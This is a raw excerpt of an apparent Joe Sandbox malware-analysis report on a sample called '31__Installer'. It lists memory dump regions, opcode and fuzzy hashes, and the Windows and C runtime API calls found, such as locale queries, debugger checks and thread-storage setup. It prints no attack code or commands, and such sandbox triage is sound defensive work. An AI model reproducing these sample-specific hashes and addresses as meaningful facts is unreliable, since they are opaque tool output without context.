                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                    • String ID:
                    • API String ID: 3551698239-0
                    • Opcode ID: cdfe25ac972e8610f28b07970a584f2a886e07f90aaebbf6406479b55b5710ac
                    • Instruction ID: 77697ad41090e870ca707962eab7878a44153d247643da9f12351c85073f258d
                    • Opcode Fuzzy Hash: cdfe25ac972e8610f28b07970a584f2a886e07f90aaebbf6406479b55b5710ac
                    • Instruction Fuzzy Hash: 90F09675A001F8ABDF17EF56CC02BAE335DAB14700F004619F406DA1D1DFB499108B50
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dd9a0abd4c93e75dc5735e4e085c41be4bcf404edf4f293e663832bbfd7d0d4f
                    • Instruction ID: 2a281c6b626a52dfb26648fa6d794d8ccb7f675ca269e996e581ac757d4858dc
                    • Opcode Fuzzy Hash: dd9a0abd4c93e75dc5735e4e085c41be4bcf404edf4f293e663832bbfd7d0d4f
                    • Instruction Fuzzy Hash: F62103B6604204DFDF06DF10D9C4B26BB6AFB98364F248569DA0E0B646C336D456CBA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f85c9119a2a05271a25a2fe596ba4b1c120649c3b9cd223038ffdfc533407fe
                    • Instruction ID: 277702edc097cef73316b9bb3f769ddb5c04bc9f935e85e790c93df02df39327
                    • Opcode Fuzzy Hash: 0f85c9119a2a05271a25a2fe596ba4b1c120649c3b9cd223038ffdfc533407fe
                    • Instruction Fuzzy Hash: D611B1B6904244CFCF06DF10D5C4B16BF62FB84324F24C5A9D9490B656C33AD456CFA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4a625294331df3cb3d4c15cb47ee3efc466f49b95635f115cd27f1da3d239686
                    • Instruction ID: dda55bb7c3d609669d1bf85285ec5303f5a7e641f61c92d0d30ce824f0d817c8
                    • Opcode Fuzzy Hash: 4a625294331df3cb3d4c15cb47ee3efc466f49b95635f115cd27f1da3d239686
                    • Instruction Fuzzy Hash: EC01F7715083049AEB114A25CC84B67BF8CDF41AA5F1CC01ADF1A4B946C7799441C7B2
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 00fa5845a21e4dc0857642ab846c50e7a862d38e7bdb0822928311867b811d10
                    • Instruction ID: 6a274d1baedce407557eb57e4868c97af8acca48e1ca7d3d8a5f3e9bb5a1800c
                    • Opcode Fuzzy Hash: 00fa5845a21e4dc0857642ab846c50e7a862d38e7bdb0822928311867b811d10
                    • Instruction Fuzzy Hash: 5B014C6140E3C09FD7128B258894B52BFB8DF53624F1D81DBD9888F1A7C2695849C772
                    APIs
                    • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,003EFA9A,?,003E6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003EF49C
                    • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,003EFA9A,?,003E6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003EF4C5
                    • GetACP.KERNEL32(?,?,003EFA9A,?,003E6AFC,?,000000BC,?,00000001,00000000), ref: 003EF4D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: fd2ce640451c9211457163b539f841f6175a876922ec4fb83917cfa2dea53039
                    • Instruction ID: 661788fe378a8f918fd1a9943e7a8f85ebc15123883522835fa4558f74378641
                    • Opcode Fuzzy Hash: fd2ce640451c9211457163b539f841f6175a876922ec4fb83917cfa2dea53039
                    • Instruction Fuzzy Hash: 4001883160166BBEEB139B63DC06B6B76ACAF01369F214635F505E50D1EBA0CA41CA54
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 003EDF93
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003EDFA8
                    • UnhandledExceptionFilter.KERNEL32(003FAEE0), ref: 003EDFB3
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 003EDFCF
                    • TerminateProcess.KERNEL32(00000000), ref: 003EDFD6
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: 677fa2866a0c3436b224910c159ad71d3846a3e25a4e23e5c6bd2c079837061d
                    • Instruction ID: a38228173b6d0422f154f3ddbef6b5453f2470410bb4c2b158d0073339a3f7d4
                    • Opcode Fuzzy Hash: 677fa2866a0c3436b224910c159ad71d3846a3e25a4e23e5c6bd2c079837061d
                    • Instruction Fuzzy Hash: 0121CDB8811345DFE746DF69EA846A43BE8BB08744F10106AE908E7BB0E7B05980CF09
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000C6DB), ref: 003EC722
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 9ad8f1d8e6312a1fc62e6c6b9b9f0912ad8a30d7aee5d0ecac0619be659c29bd
                    • Instruction ID: c20414fcafdcdf504da1fc62c0929f59e13769f115b0a16955677051aecc810d
                    • Opcode Fuzzy Hash: 9ad8f1d8e6312a1fc62e6c6b9b9f0912ad8a30d7aee5d0ecac0619be659c29bd
                    • Instruction Fuzzy Hash: EA9002B02A11518747022B715E1975B39D55AD8706B462551A101E4198DE9041019952
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID: \VJm
                    • API String ID: 0-4047210350
                    • Opcode ID: f13c2fc8178a6eccb34b5adebdbc8ed2bf11a7640710116b53e5623020ec6e06
                    • Instruction ID: 9bf813fabe4ebaeebbc8b5a44a70ea051af3b5afd29b5734ccb91cb84d5e7e4e
                    • Opcode Fuzzy Hash: f13c2fc8178a6eccb34b5adebdbc8ed2bf11a7640710116b53e5623020ec6e06
                    • Instruction Fuzzy Hash: 69914A70E042099FDF24CFA8C9947EEBBF2BF88714F14812AD415A7394EB759845CB82
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                    • Instruction ID: 27c9e2907ca062e68cfaf5ca963bfcb20412a3ed1517714ca22aa846644f821a
                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                    • Instruction Fuzzy Hash: 6CC19F73D0A9F7498B3B422D451823EEEA26F91B4431FC391DED43F58AC627AD0196D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                    • Instruction ID: 3b30830091c66a65b8021e68a0e90969e94ae0a288a41a1bc3361dce89c483a8
                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                    • Instruction Fuzzy Hash: C7C18B33D0A5F74A8B3B422D451863BEAA26F81B4931BC391CED43F59AC627AD0596D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                    • Instruction ID: d906f973c1b21921356d1363df15528df85f65c75981a348d4738c8e9fb01d4c
                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                    • Instruction Fuzzy Hash: DAC19E73D0E5F74A8B3B422E451863BEE626F81B4431BC391CED43F68AC6276D1596D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                    • Instruction ID: d64015930ff60f77e21e0392a38e1565019d427dc658d4ae10513d0c565d35c8
                    • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                    • Instruction Fuzzy Hash: 70B1AF33D0A5B74A8B3B822D455863FEEA26F91B4431FC395CDD03F58ACA27AD0196D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8a2fc00dafcc6523926814f7eb3d77fc6693b4c9039ea8ad664f7a0504cf2d65
                    • Instruction ID: 9eb6e718fefb184a9b57b824684012bfc233e0373a6339b6effaa706746bf318
                    • Opcode Fuzzy Hash: 8a2fc00dafcc6523926814f7eb3d77fc6693b4c9039ea8ad664f7a0504cf2d65
                    • Instruction Fuzzy Hash: 38817074B052188BDB1DEF7594697BE7BA7BBC8640B05946EE40BE7284DE34CC028792
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                    • Instruction ID: 18d746c929e5d2e1d8b106f29733945e697d7db75ae6792ebe3ce52497a60b00
                    • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                    • Instruction Fuzzy Hash: 5FF03972200204AFCF158F4CDC51EAA77E9EF082A0F094069FE09D7221E331ED209F80
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                    • Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
                    • Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                    • Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,003E5A5E), ref: 003E98ED
                    • __mtterm.LIBCMT ref: 003E98F9
                      • Part of subcall function 003E9632: DecodePointer.KERNEL32(00000002,003E9A5B,?,003E5A5E), ref: 003E9643
                      • Part of subcall function 003E9632: TlsFree.KERNEL32(00000002,003E9A5B,?,003E5A5E), ref: 003E965D
                      • Part of subcall function 003E9632: DeleteCriticalSection.KERNEL32(00000000,00000000,77455810,?,003E9A5B,?,003E5A5E), ref: 003EB634
                      • Part of subcall function 003E9632: _free.LIBCMT ref: 003EB637
                      • Part of subcall function 003E9632: DeleteCriticalSection.KERNEL32(00000002,77455810,?,003E9A5B,?,003E5A5E), ref: 003EB65E
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003E990F
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003E991C
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003E9929
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003E9936
                    • TlsAlloc.KERNEL32(?,003E5A5E), ref: 003E9986
                    • TlsSetValue.KERNEL32(00000000,?,003E5A5E), ref: 003E99A1
                    • __init_pointers.LIBCMT ref: 003E99AB
                    • EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99BC
                    • EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99C9
                    • EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99D6
                    • EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99E3
                    • DecodePointer.KERNEL32(003E97B6,?,003E5A5E), ref: 003E9A04
                    • __calloc_crt.LIBCMT ref: 003E9A19
                    • DecodePointer.KERNEL32(00000000,?,003E5A5E), ref: 003E9A33
                    • GetCurrentThreadId.KERNEL32 ref: 003E9A45
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: 62c6b940afe35d83e745296480b628933d85cb2d52cebf5112e4f9e1afbce3c2
                    • Instruction ID: 74441fb0c62a810ab20f936ac0f6926c30e84c531fc60379038c8e22a56afba9
                    • Opcode Fuzzy Hash: 62c6b940afe35d83e745296480b628933d85cb2d52cebf5112e4f9e1afbce3c2
                    • Instruction Fuzzy Hash: 8C3166B19013A59EDB139F76AD0576A3BA8EB84360F05063BE514F72F2DB719840CF54
                    APIs
                    • __EH_prolog.LIBCMT ref: 003E2349
                    • std::_Lockit::_Lockit.LIBCPMT ref: 003E2358
                    • int.LIBCPMT ref: 003E236F
                      • Part of subcall function 003E1035: std::_Lockit::_Lockit.LIBCPMT ref: 003E1046
                    • __CxxThrowException@8.LIBCMT ref: 003E23B4
                    • std::locale::facet::_Incref.LIBCPMT ref: 003E23C4
                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 003E23CA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
                    • String ID: bad cast
                    • API String ID: 262090721-3145022300
                    • Opcode ID: d5c6bc39e33a101130e462f4bae4269634aa12cd80aeadb251031dbd25f2e209
                    • Instruction ID: 4725c80e4175480aad3ac2c645bb15c53a53cfde5cb3c5b6d65ac4c01770a7b8
                    • Opcode Fuzzy Hash: d5c6bc39e33a101130e462f4bae4269634aa12cd80aeadb251031dbd25f2e209
                    • Instruction Fuzzy Hash: 4D1151369001A997CB17FB62D946AEE7339AB80760F11032AF5117B2D1DF749A058B94
                    APIs
                    • __EH_prolog.LIBCMT ref: 003E1E18
                    • std::_Lockit::_Lockit.LIBCPMT ref: 003E1E27
                    • int.LIBCPMT ref: 003E1E3E
                      • Part of subcall function 003E1035: std::_Lockit::_Lockit.LIBCPMT ref: 003E1046
                    • __CxxThrowException@8.LIBCMT ref: 003E1E83
                    • std::locale::facet::_Incref.LIBCPMT ref: 003E1E93
                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 003E1E99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
                    • String ID: bad cast
                    • API String ID: 262090721-3145022300
                    • Opcode ID: b1d896ebe200894e21a1341cd99718555909687a3bd77fa44cfaa71715017f7a
                    • Instruction ID: 75cc0ba38d5d4a234be16bef7ad5dc5a1fa612216f6b6cadebde3039a26598e8
                    • Opcode Fuzzy Hash: b1d896ebe200894e21a1341cd99718555909687a3bd77fa44cfaa71715017f7a
                    • Instruction Fuzzy Hash: 841173769001A997CF07FB62D906AFE7735ABC0721F15432AF5117B2D1DB349A058790
                    APIs
                    • __getptd_noexit.LIBCMT ref: 003E741A
                      • Part of subcall function 003E9723: GetLastError.KERNEL32(?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9727
                      • Part of subcall function 003E9723: ___set_flsgetvalue.LIBCMT ref: 003E9735
                      • Part of subcall function 003E9723: __calloc_crt.LIBCMT ref: 003E9749
                      • Part of subcall function 003E9723: DecodePointer.KERNEL32(00000000,?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9763
                      • Part of subcall function 003E9723: GetCurrentThreadId.KERNEL32 ref: 003E9779
                      • Part of subcall function 003E9723: SetLastError.KERNEL32(00000000,?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9791
                    • __calloc_crt.LIBCMT ref: 003E743C
                    • __get_sys_err_msg.LIBCMT ref: 003E745A
                    • _strcpy_s.LIBCMT ref: 003E7462
                    • __invoke_watson.LIBCMT ref: 003E7477
                    Strings
                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 003E7427, 003E744A
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                    • API String ID: 3117964792-798102604
                    • Opcode ID: 53eea75df67454ab67ec65f213c22b01839e27bc5955d176a50a06ebe8823637
                    • Instruction ID: e3a670c2a1e0eb663119d14c0e537aa6956284ffc6c33358b6ed9f8e07c31681
                    • Opcode Fuzzy Hash: 53eea75df67454ab67ec65f213c22b01839e27bc5955d176a50a06ebe8823637
                    • Instruction Fuzzy Hash: 7BF0C07A50C3F427CB23392B5C81E6B7A9CCB40754B11073BFB48DF1C1E9209C004990
                    APIs
                    • __EH_prolog.LIBCMT ref: 003E1A6B
                    • std::_Lockit::_Lockit.LIBCPMT ref: 003E1A7D
                    • std::exception::exception.LIBCMT ref: 003E1AB4
                      • Part of subcall function 003E3C6B: std::exception::_Copy_str.LIBCMT ref: 003E3C86
                    • __CxxThrowException@8.LIBCMT ref: 003E1AC9
                      • Part of subcall function 003E450C: RaiseException.KERNEL32(?,?,003E13AC,?,?,?,?,?,003E13AC,?,003FCCD8,00000000), ref: 003E454E
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003E1AD2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                    • String ID: bad locale name
                    • API String ID: 446407826-1405518554
                    • Opcode ID: 84d3a60618151b6f33f91d744532e66ede36c0e6abd1279ec693c498d121cd97
                    • Instruction ID: 8cdf632f332321f21967360cdb1ff5c7963b7a6ced67d18a21e5183a351cf945
                    • Opcode Fuzzy Hash: 84d3a60618151b6f33f91d744532e66ede36c0e6abd1279ec693c498d121cd97
                    • Instruction Fuzzy Hash: 2E016176901798DECB12EF9AC4805DEFFF4BF19300B40862FE55997641C7749608CB95
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,003FD628,00000008,003E9777,00000000,00000000,?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9680
                    • __lock.LIBCMT ref: 003E96B4
                      • Part of subcall function 003EB747: __mtinitlocknum.LIBCMT ref: 003EB75D
                      • Part of subcall function 003EB747: __amsg_exit.LIBCMT ref: 003EB769
                      • Part of subcall function 003EB747: EnterCriticalSection.KERNEL32(00000000,00000000,?,003E96B9,0000000D), ref: 003EB771
                    • InterlockedIncrement.KERNEL32(?), ref: 003E96C1
                    • __lock.LIBCMT ref: 003E96D5
                    • ___addlocaleref.LIBCMT ref: 003E96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
